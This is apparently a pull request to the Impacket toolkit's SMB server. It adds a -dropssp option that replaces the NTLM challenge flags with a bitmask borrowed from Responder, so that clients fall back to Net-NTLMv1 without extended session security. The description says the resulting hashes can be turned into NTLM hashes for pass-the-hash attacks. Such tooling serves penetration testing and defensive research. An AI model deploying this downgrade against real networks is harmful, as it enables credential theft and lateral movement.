### PR TITLE
Added flag to drop SSP from Net-NTLMv1 auth

### DIFF
--- a/examples/smbserver.py
+++ b/examples/smbserver.py
@@ -42,6 +42,7 @@ if __name__ == '__main__':
     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
     parser.add_argument('-ip', '--interface-address', action='store', default='0.0.0.0', help='ip address of listening interface')
     parser.add_argument('-port', action='store', default='445', help='TCP port for listening incoming connections (default 445)')
+    parser.add_argument('-dropssp', action='store_true', default=False, help='Disable NTLM ESS/SSP during negotiation')
     parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')
 
     if len(sys.argv)==1:
@@ -72,6 +73,7 @@ if __name__ == '__main__':
 
     server.addShare(options.shareName.upper(), options.sharePath, comment)
     server.setSMB2Support(options.smb2support)
+    server.setDropSSP(options.dropssp)
 
     # If a user was specified, let's add it to the credentials for the SMBServer. If no user is specified, anonymous
     # connections will be allowed

--- a/impacket/ntlm.py
+++ b/impacket/ntlm.py
@@ -145,6 +145,9 @@ NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED      = 0x00001000
 # If set, the connection SHOULD be anonymous
 NTLMSSP_NEGOTIATE_ANONYMOUS                = 0x00000800
 
+# Flags used by Responder to drop SSP (little endian)
+NTLMSSP_DROP_SSP_STATIC                    = 0xe2818215
+
 # If set, LM authentication is not allowed and only NT authentication is used.
 NTLMSSP_NEGOTIATE_NT_ONLY                  = 0x00000400
 
@@ -269,7 +272,7 @@ class VERSION(Structure):
     )
 
 class NTLMAuthNegotiate(Structure):
-
+    
     structure = (
         ('','"NTLMSSP\x00'),
         ('message_type','<L=1'),
@@ -587,7 +590,7 @@ def getNTLMSSPType1(workstation='', domain='', signingRequired = False, use_ntlm
        auth['flags'] |= NTLMSSP_NEGOTIATE_TARGET_INFO
     auth['flags'] |= NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY | NTLMSSP_NEGOTIATE_UNICODE | \
                      NTLMSSP_REQUEST_TARGET |  NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_56
-
+    
     # We're not adding workstation / domain fields this time. Normally Windows clients don't add such information but,
     # we will save the workstation name to be used later.
     auth.setWorkstation(workstation)

--- a/impacket/smbserver.py
+++ b/impacket/smbserver.py
@@ -2509,7 +2509,7 @@ class SMBCommands:
                     ansFlags |= ntlm.NTLM_NEGOTIATE_OEM
 
                 ansFlags |= ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_NEGOTIATE_TARGET_INFO | ntlm.NTLMSSP_TARGET_TYPE_SERVER | ntlm.NTLMSSP_NEGOTIATE_NTLM | ntlm.NTLMSSP_REQUEST_TARGET
-
+                
                 # Generate the AV_PAIRS
                 av_pairs = ntlm.AV_PAIRS()
                 # TODO: Put the proper data from SMBSERVER config
@@ -2519,9 +2519,9 @@ class SMBCommands:
                     ntlm.NTLMSSP_AV_DNS_DOMAINNAME] = smbServer.getServerDomain().encode('utf-16le')
                 av_pairs[ntlm.NTLMSSP_AV_TIME] = struct.pack('<q', (
                             116444736000000000 + calendar.timegm(time.gmtime()) * 10000000))
-
+                
                 challengeMessage = ntlm.NTLMAuthChallenge()
-                challengeMessage['flags'] = ansFlags
+                challengeMessage['flags'] = (ntlm.NTLMSSP_DROP_SSP_STATIC | 0) if smbServer._SMBSERVER__dropSSP else ansFlags
                 challengeMessage['domain_len'] = len(smbServer.getServerDomain().encode('utf-16le'))
                 challengeMessage['domain_max_len'] = challengeMessage['domain_len']
                 challengeMessage['domain_offset'] = 40 + 16
@@ -2894,7 +2894,9 @@ class SMB2Commands:
                 ansFlags |= ntlm.NTLM_NEGOTIATE_OEM
 
             ansFlags |= ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_NEGOTIATE_TARGET_INFO | ntlm.NTLMSSP_TARGET_TYPE_SERVER | ntlm.NTLMSSP_NEGOTIATE_NTLM | ntlm.NTLMSSP_REQUEST_TARGET
-
+            
+            if smbServer._SMBSERVER__dropSSP:
+                ansFlags = (ntlm.NTLMSSP_DROP_SSP_STATIC | 0)
             # Generate the AV_PAIRS
             av_pairs = ntlm.AV_PAIRS()
             # TODO: Put the proper data from SMBSERVER config
@@ -3964,6 +3966,8 @@ class SMBSERVER(socketserver.ThreadingMixIn, socketserver.TCPServer):
 
         # SMB2 Support flag = default not active
         self.__SMB2Support = False
+        
+        self.__dropSSP = False
 
         # Allow anonymous logon
         self.__anonymousLogon = True
@@ -4608,6 +4612,10 @@ class SMBSERVER(socketserver.ThreadingMixIn, socketserver.TCPServer):
         else:
             self.__SMB2Support = False
 
+        if self.__serverConfig.has_option("global", "DropSSP"):
+            self.__dropSSP = self.__serverConfig.getboolean("global", "DropSSP")
+        else:
+            self.__dropSSP = False
 
         if self.__serverConfig.has_option("global", "anonymous_logon"):
             self.__anonymousLogon = self.__serverConfig.getboolean("global", "anonymous_logon")
@@ -4909,5 +4917,13 @@ class SimpleSMBServer:
             self.__smbConfig.set("global", "SMB2Support", "True")
         else:
             self.__smbConfig.set("global", "SMB2Support", "False")
+        self.__server.setServerConfig(self.__smbConfig)
+        self.__server.processConfigFile()
+
+    def setDropSSP(self, value):
+        if value is True:
+            self.__smbConfig.set("global", "DropSSP", "True")
+        else:
+            self.__smbConfig.set("global", "DropSSP", "False")
         self.__server.setServerConfig(self.__smbConfig)
         self.__server.processConfigFile()


### PR DESCRIPTION
This new option substitutes the Net-NTLMv1 flags in the Type 2 message to receive a clean Net-NTLMv1 hash, which can be easily converted into an NTLM hash and therefore used in PTH attacks.
The employed bitmask was taken from Responder.